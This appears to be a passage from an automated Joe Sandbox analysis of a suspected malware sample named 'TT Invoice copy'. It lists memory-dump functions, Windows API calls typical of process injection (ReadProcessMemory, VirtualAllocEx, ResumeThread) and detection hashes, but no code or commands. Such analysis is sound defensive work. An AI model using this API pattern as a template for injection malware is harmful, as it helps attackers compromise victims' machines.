                                                                                  control_flow_graph 818 e30fd8-e31065 ReadProcessMemory 821 e31067-e3106d 818->821 822 e3106e-e3109e 818->822 821->822
                                                                                  APIs
                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00E31058
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 1726664587-0
                                                                                  • Opcode ID: 1139104147631c52eb0242ea356a123bd567d37490d7286582cc4cf406e4fbd9
                                                                                  • Instruction ID: d5a800b362e730787c531d10be54225d1dc624e876f9af5bb4a6dee77de150bc
                                                                                  • Opcode Fuzzy Hash: 1139104147631c52eb0242ea356a123bd567d37490d7286582cc4cf406e4fbd9
                                                                                  • Instruction Fuzzy Hash: C52114B1D002599FCB10DFAAC885AEEFBF5FF48324F10842AE558A7250C7789944CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E6EAA8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 826 e6eaa8-e6eb3c DuplicateHandle 827 e6eb45-e6eb62 826->827 828 e6eb3e-e6eb44 826->828 828->827
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E6EB2F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: e451a7d1160f8f99462e4d1dc14c090e9dee30c830bf25808bac9ea60adaee15
                                                                                  • Instruction ID: 9c49ec3ec67240ab32102d3f1a586b2e19288cc3f0424efc62b0154fcdaa39c0
                                                                                  • Opcode Fuzzy Hash: e451a7d1160f8f99462e4d1dc14c090e9dee30c830bf25808bac9ea60adaee15
                                                                                  • Instruction Fuzzy Hash: 1421E2B5D002089FDB10CFAAD984ADEFBF8EB48324F14801AE918A3350D374A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E6C280 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00E6C8A1,00000800,00000000,00000000), ref: 00E6CAB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 41fe695b6cbd9f7f615382bf76c8a3c2bb8ffaad0a20656947bd6a8a81a5aad8
                                                                                  • Instruction ID: c91d460c69e4c7aeaa8a1718a8051693b3c9bd133df0046f84ab493083784d2d
                                                                                  • Opcode Fuzzy Hash: 41fe695b6cbd9f7f615382bf76c8a3c2bb8ffaad0a20656947bd6a8a81a5aad8
                                                                                  • Instruction Fuzzy Hash: 341103B6D002499FDB10CF9AD444AEEFBF4EB48364F14842AD559B7210C375A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E30E28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00E30E96
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: d69d84a43d15ad5ca2b55e9b15e4d3085dfee141eb73f47418a95d7a1d58f9b8
                                                                                  • Instruction ID: 403adab086b31189a12162ee878f559e6df8b7de8cd15c023dc7466fd506a057
                                                                                  • Opcode Fuzzy Hash: d69d84a43d15ad5ca2b55e9b15e4d3085dfee141eb73f47418a95d7a1d58f9b8
                                                                                  • Instruction Fuzzy Hash: 521126729002499FCF10DFAAC845BDEBFF5EB88324F108819E559A7250C775A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E30CA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: bed19a5adce77ed4d6bb7c66bc59e62532a0ddf21f79632980f345a24e86300b
                                                                                  • Instruction ID: e7ae32118dec4b2f641d31a310e11ce2988b00ad96ddf43bf59b50a19510b859
                                                                                  • Opcode Fuzzy Hash: bed19a5adce77ed4d6bb7c66bc59e62532a0ddf21f79632980f345a24e86300b
                                                                                  • Instruction Fuzzy Hash: D51125B1D002498BDB20DFAAC4497DEFBF5AB88324F208429D459A7250CB79A944CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E328C4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 00E35955
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: 555106c8b303431762206283e8392dbfa9fc030464047dd07b95da4e07fd9668
                                                                                  • Instruction ID: 1a96e0e01ad5502103e12cbedafe84783fe262207ecc1097f9963deeb76b74cc
                                                                                  • Opcode Fuzzy Hash: 555106c8b303431762206283e8392dbfa9fc030464047dd07b95da4e07fd9668
                                                                                  • Instruction Fuzzy Hash: D511DFB58006499FDB10DF9AC849BDEBBF8EB48324F10841AE568A7210C375A954CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E6C7C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00E6C826
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: c8a5e7146fa393f682da151bfecbae294a9a8d971e5455c98e6c5ccb7e7110f0
                                                                                  • Instruction ID: cee6a3674b1a796894eef2407d891e1613a2d7134005ab1bdcf464d5af046e07
                                                                                  • Opcode Fuzzy Hash: c8a5e7146fa393f682da151bfecbae294a9a8d971e5455c98e6c5ccb7e7110f0
                                                                                  • Instruction Fuzzy Hash: 5B1110B6C002498FCB24DF9AD444ADEFBF4EB88324F20842AD458B7210C379A545CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526ABC0 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te^q
                                                                                  • API String ID: 0-671973202
                                                                                  • Opcode ID: d8cbcd842f8f184e5ef38fb499e74d47345a6f41f7c5cf83c792c06a03ac8e02
                                                                                  • Instruction ID: c393c9d77be9e4c36b3e486a8437b6d7cdfb7740486d72f3d24dea02735eb91f
                                                                                  • Opcode Fuzzy Hash: d8cbcd842f8f184e5ef38fb499e74d47345a6f41f7c5cf83c792c06a03ac8e02
                                                                                  • Instruction Fuzzy Hash: 9F31E4B0E152088BDB08DFAAD9546AEFBF7BF89300F14902A9819BB254DB7459458F50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05267CC9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0
                                                                                  • API String ID: 0-4108050209
                                                                                  • Opcode ID: 1d1c5fbe0e2535562f462a2d1a3396bf2daa1e38dbce7df8df08e69fe1b2c0d1
                                                                                  • Instruction ID: 0694c3ec025327ff11018c72ffef09d0118da96eb144672e873aca167b6ca45a
                                                                                  • Opcode Fuzzy Hash: 1d1c5fbe0e2535562f462a2d1a3396bf2daa1e38dbce7df8df08e69fe1b2c0d1
                                                                                  • Instruction Fuzzy Hash: 58F05E74D1D298CFCB01CFA4D880BA87BB6AF07204F1445E5D4495B213C3740A49CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526ADF0 Relevance: .3, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8bcb53b5038f6d0e38962ba13cc15bf9db50af8017a8734f7d19393d2342c837
                                                                                  • Instruction ID: 55f7bb4f541802391fbb9af85d12212cf646a1ffa65d15702c358aa2a5808d64
                                                                                  • Opcode Fuzzy Hash: 8bcb53b5038f6d0e38962ba13cc15bf9db50af8017a8734f7d19393d2342c837
                                                                                  • Instruction Fuzzy Hash: 05B11E70E2521ADFCB04DFA8D540ADDFBBAFF89300F109665E419AB355DB70A985CB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05267349 Relevance: .2, Instructions: 176COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8cbc28e4c6f638a2ae544dd2d2494aa555df17f30bf317ffae1c1ba4df2bbc31
                                                                                  • Instruction ID: 20cda36cd8ece71af4329f805d3ebc7eebabe4f35e41e86bf1135087b78cf3c5
                                                                                  • Opcode Fuzzy Hash: 8cbc28e4c6f638a2ae544dd2d2494aa555df17f30bf317ffae1c1ba4df2bbc31
                                                                                  • Instruction Fuzzy Hash: 9851D130F642059BD704DBA8D890B7EBBB2FF85304F188566F4559B3C6DB748882CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05267D17 Relevance: .1, Instructions: 134COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 48ec5f412559a0a63a532078e0c58be162779c52f80f1cfad0d09079c949dff4
                                                                                  • Instruction ID: ec0e591d9ffcd17839e6fb95d16915bb74e26f6b8d9f4ff1802008a07028f787
                                                                                  • Opcode Fuzzy Hash: 48ec5f412559a0a63a532078e0c58be162779c52f80f1cfad0d09079c949dff4
                                                                                  • Instruction Fuzzy Hash: 8251C574E1511A9BCB04CFA9E5809AEBBF2FF48314F289555E419E7305D730A985CF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05266970 Relevance: .1, Instructions: 97COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b2caf9484ba66fe0a62e0a94f62a63ef219262aadaf963efb9adbd934f9c7549
                                                                                  • Instruction ID: 2cb62e032dd1415b3a6512a3cbe6f728f6e9ec44edb3007ac95692095de8f748
                                                                                  • Opcode Fuzzy Hash: b2caf9484ba66fe0a62e0a94f62a63ef219262aadaf963efb9adbd934f9c7549
                                                                                  • Instruction Fuzzy Hash: 1C313AB5A10249AFCF10DFA9D844ADEBFF5EF48310F10842AE909A7311D775A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 052680D8 Relevance: .1, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fc0c00263a4cdebe8a916a9ea0d3c7d62534f9f66f3a5fd2f195d6d4f4ef7954
                                                                                  • Instruction ID: 2d50983429572635e395167475be245b0054036bc03c88778ec31a63a7beffe2
                                                                                  • Opcode Fuzzy Hash: fc0c00263a4cdebe8a916a9ea0d3c7d62534f9f66f3a5fd2f195d6d4f4ef7954
                                                                                  • Instruction Fuzzy Hash: 00319072A24596CFCB10CFA9D9946AEFBF1FF08310F048666E169E3241D734E580CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05267940 Relevance: .1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 858c1d9a8a4e1f41b5b207907d3f02a341a7187a75007e13f98d311cf3a8360b
                                                                                  • Instruction ID: 9d69ce950291a2fb513f9b752f17f33fd8dacf1f2d2307e46f6866891fa8b0bc
                                                                                  • Opcode Fuzzy Hash: 858c1d9a8a4e1f41b5b207907d3f02a341a7187a75007e13f98d311cf3a8360b
                                                                                  • Instruction Fuzzy Hash: 5F319E71A26146CBD704CF59E880AAAFBF6FF46308F588266E119DB351D274DE81CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 009AD4D8 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1678951944.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9ad000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8da31cc2d4cf07ddece3947c694dd11c3f26890188fb3c8b63f874c54f42658d
                                                                                  • Instruction ID: db02f5342c6a9c0edf87e913622408940601229fed72a679456148c357560905
                                                                                  • Opcode Fuzzy Hash: 8da31cc2d4cf07ddece3947c694dd11c3f26890188fb3c8b63f874c54f42658d
                                                                                  • Instruction Fuzzy Hash: 24216771900200DFCB04DF04C9C4B27BFA9FB99318F24C569E80A0B65AC33AD846CBE2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 009AD3EC Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1678951944.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9ad000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bdc47451803d45059dce1a892872b18a03f8780fb722b995932977324996534f
                                                                                  • Instruction ID: 2151084e9cf200cb3a15963f200c258420a1194b22edc32c4da93fa7f04f82f1
                                                                                  • Opcode Fuzzy Hash: bdc47451803d45059dce1a892872b18a03f8780fb722b995932977324996534f
                                                                                  • Instruction Fuzzy Hash: 41213771505200DFDB05DF14D9C0B27BFA6FB98324F20C569E90A4B6A6C33AE856C7E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05267FC8 Relevance: .1, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 314e828850b1f342fbdbc7b64baea12ee894a7ef1ebb3380da806be76ea8596f
                                                                                  • Instruction ID: 17029721e8c23ca156b2a6bc5fa2eb40d0179d5cafb0b646cffcafe937e4e433
                                                                                  • Opcode Fuzzy Hash: 314e828850b1f342fbdbc7b64baea12ee894a7ef1ebb3380da806be76ea8596f
                                                                                  • Instruction Fuzzy Hash: 6F21F930B60215DFD7188B19D818F2A7BE7FFC4B10F24C966E11A9F2D5DA7288818B51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 009BD01C Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679002099.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9bd000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 95246c67a7b5da18d3bac0699d33015ad3c8393a12dac4f9d965aa2ccf24aad2
                                                                                  • Instruction ID: 5eff6271012947e322346a8c2fc41a748b55f44844b8e04e1cd5c654d0d9a7a9
                                                                                  • Opcode Fuzzy Hash: 95246c67a7b5da18d3bac0699d33015ad3c8393a12dac4f9d965aa2ccf24aad2
                                                                                  • Instruction Fuzzy Hash: 0F213471604200DFCB14EF14DAC4B66BFA5FB88324F20C96DD80A4B296D33AD847CA61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 009BD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679002099.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9bd000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14e28546ad21586912ab873dae38404080a5c8355eb4eb30b0f04df71d9dc531
                                                                                  • Instruction ID: ea93431f941d49b82e0356b533e074c2fcd4ef6085636931c32b94a33f08b7a1
                                                                                  • Opcode Fuzzy Hash: 14e28546ad21586912ab873dae38404080a5c8355eb4eb30b0f04df71d9dc531
                                                                                  • Instruction Fuzzy Hash: FB212671504284EFDB05DF14DAC0B66BBA5FB84324F20CA6DE8194B296D33AD846CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05267FC7 Relevance: .1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 081034220d0ea6cbcaf366186f0dadb17d254bec4b7aaf5ef239ef2682dcb4cf
                                                                                  • Instruction ID: 3fb628bcd1543600cf92def3c87e19ed0fc2f310323466ca81c65ff23684e283
                                                                                  • Opcode Fuzzy Hash: 081034220d0ea6cbcaf366186f0dadb17d254bec4b7aaf5ef239ef2682dcb4cf
                                                                                  • Instruction Fuzzy Hash: 2011D330B64201EFE7248B15D805F2ABBE3FF84B11F24C566E51A9F2D5CA7688818B41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05265894 Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 561d3142c3337ba66ac482789be605b118be7662cc0f20fa5a254e1a3d202695
                                                                                  • Instruction ID: 12b7acbb59fc5b6e56ae8954b5ab30b3d499317c174fdd1e7b14881dbdc78e20
                                                                                  • Opcode Fuzzy Hash: 561d3142c3337ba66ac482789be605b118be7662cc0f20fa5a254e1a3d202695
                                                                                  • Instruction Fuzzy Hash: AE2100B5D002499FCB10DF9AD884ADEBBF4FB48320F10842AE919A7311C375A984CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 009AD4D3 Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1678951944.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9ad000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                  • Instruction ID: 3caf97abd4f7cadbaef36f03f5f92721d37baae8737a834d795e94b812412acc
                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                  • Instruction Fuzzy Hash: 32110376804240CFCB02CF00D5C4B16BF71FB94318F24C6A9E80A0B65AC33AD85ACBE1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 009AD3E7 Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1678951944.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9ad000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                  • Instruction ID: f6649a05b042b2cbed80d588dbb32db2d3efc04a72c7af84367d74da8d58fce7
                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                  • Instruction Fuzzy Hash: A2110376404240CFCB02CF00D5C4B16BFB2FB98324F24C5A9D8090B666C33AE85ACBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 009BD1CF Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679002099.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9bd000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction ID: da28b4c941d4d99fa20e95bf7a2a83fcb26e087ebb62c906ca85ddda078d49fc
                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction Fuzzy Hash: 1D11BB75504284DFDB02CF10C6C4B55BFA1FB84324F24C6AAD8494B296C33AD80ACB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 009BD017 Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679002099.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9bd000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction ID: 6e729ddd3ef9c79037584ceac1ef4ade1cce5fb506a906f5b9ac18e27fb8d419
                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction Fuzzy Hash: 0C11DD75504280CFCB11DF14D6C4B56FFA2FB84324F28C6AAD8094B656C33AD80ACBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526BA70 Relevance: .0, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e84acd74bf8ab7a8176a5010c05c3b7cfc7c74e1ebdb0f075cfb0feb32b30c7
                                                                                  • Instruction ID: 4d8a559c4712bfdecc99a3904b9077dffceb2c31caf3a66dc16538255a03eac8
                                                                                  • Opcode Fuzzy Hash: 3e84acd74bf8ab7a8176a5010c05c3b7cfc7c74e1ebdb0f075cfb0feb32b30c7
